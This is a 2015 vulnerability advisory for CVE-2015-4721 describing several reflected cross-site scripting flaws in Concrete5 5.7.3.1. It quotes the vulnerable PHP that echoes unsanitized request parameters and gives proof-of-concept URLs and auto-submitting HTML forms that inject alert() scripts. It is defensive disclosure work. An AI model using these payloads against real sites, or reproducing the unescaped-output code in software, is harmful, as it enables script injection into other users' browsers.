concrete5 multiple reflected xss advisory
TRANSCRIPT
Edition: 1.0
Last Edit: 24/06/2015
Cassification: Not restricted
Multiple Reflected Cross Site Scripting Vulnerabilities in Concrete5 version 5.7.3.1
Author: Egidio Romano
Multiple Reflected XSS in Concrete5 version 5.7.3.1
Edition: v1.0 Date: 24/06/2015 Not restricted Page 1/4
Summary
Vulnerabilities Class Cross Site Scripting (XSS)
CVE ID CVE-2015-4721
Remote Yes
Local No
Published June 6, 2015
Updated June 24, 2015
Credit Egidio Romano
Vulnerable Version 5.7.3.1 and probably prior versions
Fixed On 5.7.4
Other References https://hackerone.com/reports/59661
http://blog.mindedsecurity.com/2015/06/multiple-security-issues-discovered-in-concrete5-part1.html
Description
Concrete5 is vulnerable to some reflected Cross Site Scripting (XSS) attacks because certain user input is being used within the output it generates without validating or encoding it.
Vulnerabilities Details
Following are the reflected XSS vulnerabilities identified:
File: /concrete/views/panels/details/page/versions.php (lines 5-14):
<?php foreach($_REQUEST['cvID'] as $cvID) {
$tabs[] = array('view-version-' . $cvID, t('Version %s', $cvID), $checked);
$checked = false;
}
print $ih->tabs($tabs);
foreach($_REQUEST['cvID'] as $cvID) { ?>
Multiple Reflected XSS in Concrete5 version 5.7.3.1
Edition: v1.0 Date: 24/06/2015 Not restricted Page 2/4
<div id="ccm-tab-content-view-version-<?php echo $cvID?>" style="display: <?php
echo $display?>; height: 100%">
<iframe border="0" id="v<?php echo time()?>" frameborder="0" height="100%"
width="100%" src="<?php echo
REL_DIR_FILES_TOOLS_REQUIRED?>/pages/preview_version?cvID=<?php echo $cvID?>&cID=<?php
echo $_REQUEST['cID']?>" />
User input passed through the “cvID” and “cID” request parameters is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting malicious URLs like these:
http://[host]/index.php/ccm/system/panels/details/page/versions?cID=1&cvID[]=%22%3E%3Cscri
pt%3Ealert%28/XSS/%29%3C/script%3E%3C!--
http://[host]/index.php/ccm/system/panels/details/page/versions?cvID[]=1&cID=1%22%3E%3C/if
rame%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
File: /concrete/src/Form/Service/Widget/UserSelector.php (lines 17-35):
public function selectUser($fieldName, $uID = false, $javascriptFunc …
$selectedUID = 0;
if (isset($_REQUEST[$fieldName])) {
$selectedUID = $_REQUEST[$fieldName];
} else if ($uID > 0) {
$selectedUID = $uID;
}
$html = '';
$html .= '<div class="ccm-summary-selected-item"><div class="ccm-summary-
selected-item-inner"><strong class="ccm-summary-selected-item-label">';
if ($selectedUID > 0) {
$ui = UserInfo::getByID($selectedUID);
$html .= $ui->getUserName();
}
$html .= '</strong></div>';
$identifier = new \Concrete\Core\Utility\Service\Identifier();
$selector = $identifier->getString(32);
$html .= '<a class="ccm-sitemap-select-item" data-form-user-selector="' .
$selector . '" dialog-append-buttons="true" dialog-width="90%" dialog-height="70%" dialog-
modal="false" dialog-title="' . t('Choose User') . '" href="' .
URL::to('/ccm/system/dialogs/user/search') . '">' . t('Select User') . '</a>';
$html .= '<input type="hidden" data-form-user-selector-input="' . $selector
. '" name="' . $fieldName . '" value="' . $selectedUID . '">';/>
User input passed through the “uID” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this:
Multiple Reflected XSS in Concrete5 version 5.7.3.1
Edition: v1.0 Date: 24/06/2015 Not restricted Page 3/4
http://[host]/index.php/ccm/system/panels/details/page/attributes?cID=1&uID=%22%3E%3Cscrip
t%3Ealert%28/XSS/%29%3C/script%3E
File: /concrete/elements/group/search.php (lines 4-20):
$searchRequest = $_REQUEST;
$result = Loader::helper('json')->encode($controller->getSearchResultObject()-
>getJSONObject());
$tree = GroupTree::get();
$guestGroupNode = GroupTreeNode::getTreeNodeByGroupID(GUEST_GROUP_ID);
$registeredGroupNode = GroupTreeNode::getTreeNodeByGroupID(REGISTERED_GROUP_ID);
?>
<style type="text/css">
div[data-search=groups] form.ccm-search-fields {
margin-left: 0px !important;
}
</style>
<div data-search="groups">
<script type="text/template" data-template="search-form">
<form role="form" data-search-form="groups" action="<?php echo
URL::to('/ccm/system/search/groups/submit')?>" class="form-inline ccm-search-fields ccm-
search-fields-none">
<input type="hidden" name="filter" value="<?php echo $searchRequest['filter']?>" />
User input passed through the “filter” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this:
http://[host]/index.php/dashboard/users/groups?filter=%22%3E%3Cscript%3Ealert%28/XSS/%29%3
C/script%3E
URL: http://[host]/index.php/dashboard/system/multilingual/setup/load_icon
User input passed through the “msCountry” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this:
<html>
<body>
<form method="POST"
action="http://[host]/index.php/dashboard/system/multilingual/setup/load_icon">
<input type="hidden" name="msCountry" value='"><script>alert(/XSS/)</script><!--'>
</form>
Multiple Reflected XSS in Concrete5 version 5.7.3.1
Edition: v1.0 Date: 24/06/2015 Not restricted Page 4/4
<script>document.forms[0].submit()</script>
</body>
</html>
URL: http://[host]/index.php/dashboard/pages/single
User input passed through the “pageURL” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this:
<html>
<body>
<form method="POST" action="http://[host]/index.php/dashboard/pages/single">
<input type="hidden" name="pageURL" value='"><script>alert(/XSS/)</script>'>
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
File: /concrete/attributes/select/form.php (lines 55-60):
$vals = $this->post('atSelectNewOption');
if (is_array($vals)) {
foreach($vals as $v) { ?>
<div class="newAttrValue">
<?php echo $form->hidden($this-
>field('atSelectNewOption') . '[]', $v)?>
<span class="badge"><?php echo $v?></span> />
User input passed through the “atSelectNewOption” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser.